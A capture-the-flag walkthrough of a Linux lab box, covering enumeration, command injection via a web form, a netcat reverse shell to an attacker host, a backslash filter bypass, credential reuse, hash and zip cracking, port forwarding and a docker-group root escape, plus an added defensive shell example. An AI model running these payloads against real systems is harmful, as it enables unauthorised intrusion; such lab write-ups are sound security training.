Initial foothold
1. Port scan
nmap -Pn <target ip>
nmap -Pn -p1000- <target ip>
There are three open ports: 21, 22 and 80.
2. OS and service scan
nmap -A -p21,22,80 <target ip>
The OS is Ubuntu.
There are three services:
- 21/tcp open ftp vsftpd 3.0.3 w/ anonymous login
- 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux;
- 80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
3. Vuln scan
nmap --script vuln -p21,22,80 <target ip>
The scripts discovered these directories on the HTTP service:
/css/
/images/
/js/
/secret/
Service Enumeration
1. FTP on port 21 w/ anonymous login
Connect and download the file.
ftp <target ip>
username: anonymous
ls -la
get note.txt
Read the file
cat note.txt
The note contains possible usernames; I save them as users.txt. It also hints that one of the services has a filter in place.
2. SSH on port 22
Test the connection
ssh <target ip>
The connection is accepted, so the service is reachable.
3. HTTP on port 80
nikto scan
nikto -h http://<target ip>/
It discovers the same directories as the vuln scan.
Directory scan w/ gobuster
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://<target ip>/ -x php,txt,html,sh,cgi,bak -q
Access the site
I browsed every page until I came across the /secret directory, which offers a command execution form.
Exploitation
1. Test the command function
- Ping command
On the attacker machine, capture ICMP on the VPN interface:
tcpdump ip proto \\icmp -i tun0
On the target, submit a ping to the attacker machine through the form:
ping -c 10 <attacker ip>
Back on the attacker machine, the echo requests arrive. The command injection works as expected.
- Reverse shell
Create listener on port 443
rlwrap nc -lvp 443
Inject the reverse shell command
I will use this command.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attacker ip> 443 >/tmp/f
The command is rejected by the filter hinted at in note.txt from the FTP service: it matches blocked command names in the literal request text.
To bypass it, I insert '\' into the command names. The filter compares the literal text and no longer sees rm, cat, sh or nc, but the target's shell drops unquoted backslashes during quote removal, so r\m is executed as rm.
r\m /t\m\p/f;m\k\f\i\f\o /t\m\p/f;c\a\t /t\m\p/f|/b\i\n/s\h -i 2>&1|n\c <attacker ip> 443 >/t\m\p/f
Back at the listener, I now have a shell.
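Why the backslash trick gets past the filter, and what a safe version of the ping feature looks like, as an added shell example (not code from the original writeup or the room): a naive keyword blacklist (the exact words the /secret page blocks are not shown on this page, so the list here is an assumption), a look at what /bin/sh makes of an escaped word, and an allowlist-based ping wrapper that never re-parses its input through a shell.

```shell
#!/bin/sh
# Added example (not code from the original writeup): why 'r\m' slips past a
# keyword blacklist, and what a safe ping endpoint does instead.

# ASSUMPTION: the exact words the /secret page blocks are not shown in the
# writeup; this list stands in for a typical blacklist of that kind.
BLOCKED='nc|bash|sh|python|perl|rm|mkfifo|cat|wget|curl'

# Naive blacklist: matches the literal request text. Returns 0 (allowed)
# when none of the blocked words occur as a substring, 1 (blocked) otherwise.
naive_filter() {
    if printf '%s' "$1" | grep -Eq "$BLOCKED"; then
        return 1
    fi
    return 0
}

# Show what the target's /bin/sh executes for one escaped word: during quote
# removal an unquoted backslash before an ordinary character is dropped, so
# the word 'n\c' is run as 'nc'. (Single word only: it is parsed by a shell.)
shell_sees() {
    sh -c "printf '%s' $1"
}

# Hardened alternative: validate against an allowlist and never hand the
# value to a shell. Only a dotted-quad IPv4 address passes.
is_ipv4() {
    printf '%s' "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$'
}

# Passing the validated value as a single argv element means no shell
# metacharacter in it can ever be re-parsed.
safe_ping() {
    is_ipv4 "$1" || { printf 'rejected: %s\n' "$1" >&2; return 1; }
    ping -c 1 -W 1 "$1"
}

# Demo with the writeup's two payloads (attacker IP replaced by a constructed
# placeholder). The raw payload is blocked; the escaped one slips through.
RAW='rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 443 >/tmp/f'
ESC='r\m /t\m\p/f;m\k\f\i\f\o /t\m\p/f;c\a\t /t\m\p/f|/b\i\n/s\h -i 2>&1|n\c 10.10.10.10 443 >/t\m\p/f'

for p in "$RAW" "$ESC"; do
    if naive_filter "$p"; then
        printf 'blacklist ALLOWS : %s\n' "$p"
    else
        printf 'blacklist blocks : %s\n' "$p"
    fi
done
printf '%s\n' "shell runs n\\c as: $(shell_sees 'n\c')"
safe_ping "$ESC" || true    # rejected by the allowlist, ping is never reached
```

Run it with sh; the only network call, ping, is reached only by a value that passed the IPv4 allowlist, so the demo itself stays offline.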
Privilege Escalation
1. Get a TTY shell
which python
The machine doesn't have a python command.
Maybe it has python3:
which python3
python3 -c 'import pty;pty.spawn("/bin/bash");'
Now I have TTY shell and current directory is /var/www/html/secret.
2. Explore directories
I came across another HTTP site's directory in /var/www.
I think it's a hidden HTTP site that is reachable only from this machine.
less /var/www/files/index.php
I got a MySQL credential.
Try to log in as root, in case the password is reused.
su root
password: !@m+her00+@db
Failed!!!
3. Verify sudo
sudo -l
Run the permitted command:
sudo /home/apaar/.helpline.sh
Failed!!!
Run it as apaar:
sudo -u apaar /home/apaar/.helpline.sh
When the script asks for input, I supply /bin/bash to get a shell:
/bin/bash
whoami
Now I have escalated to apaar.
Verify sudo again
sudo -l
It's the same entry as for www-data. Supplying /bin/bash again as www-data would only make me apaar again.
Read the user flag
cd /home/apaar
ls -la
cat local.txt
Now I got the first flag.
4. Login to mysql
mysql -uroot '-p!@m+her00+@db'
show databases;
There's a webportal schema.
Get webportal's tables.
use webportal;
show tables; -> users
select * from users;
I got the password hashes of the web users (aurick, anurodh and apaar).
Crack the hashes w/ CrackStation.
Try reusing the passwords for the local accounts:
su aurick
password: masterpassword
su anurodh
password: masterpassword
su apaar
password: dontaskdonttell
All failed!!!
5. Searching for hidden port and service
Since there's a hidden website stored in /var/www/files/, my suspicion is that this machine has a hidden listening port.
Verify the listening ports
ss -tunpl
As suspected, something listens on port 9001.
Apache can be configured to listen on a port other than 80. The virtual host configuration is located in:
/etc/apache2/sites-enabled/
Verify
cd /etc/apache2/sites-enabled/
ls -la
cat 000-default.conf
6. Port-forwarding
Back on the attacker machine, start the SSH service
systemctl start ssh.socket
systemctl status ssh.socket
On the target machine, forward the local port back to the attacker machine (remote port forward):
ssh -R 9001:127.0.0.1:9001 <attacker user>@<attacker ip>
Access the site from the attacker machine
http://localhost:9001
Log in w/ the credential cracked from the MySQL hashes
username: Aurick
password: masterpassword
As hinted, I downloaded the image.
7. Steganography
Read file metadata
exiftool <filename>
Not much is revealed.
Extract hidden file w/ steghide
steghide extract -sf ./<file>
This yields backup.zip.
Unzip
unzip backup.zip
It needs a password.
Find the password w/ fcrackzip
fcrackzip -u -v -D -p rockyou.txt backup.zip
Unzip again and supply the recovered password. Now I have source_code.php.
cat source_code.php
There's a base64 string.
Decode it w/ CyberChef.
Try to log in as anurodh with the decoded password:
su anurodh
password: !d0ntKn0wmYp@ssw0rd
Verify user
id
I'm a member of the docker group.
Exploit docker group membership: mount the host filesystem into a container and chroot into it
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
whoami
Now I'm root.
cd /root
ls -la
cat proof.txt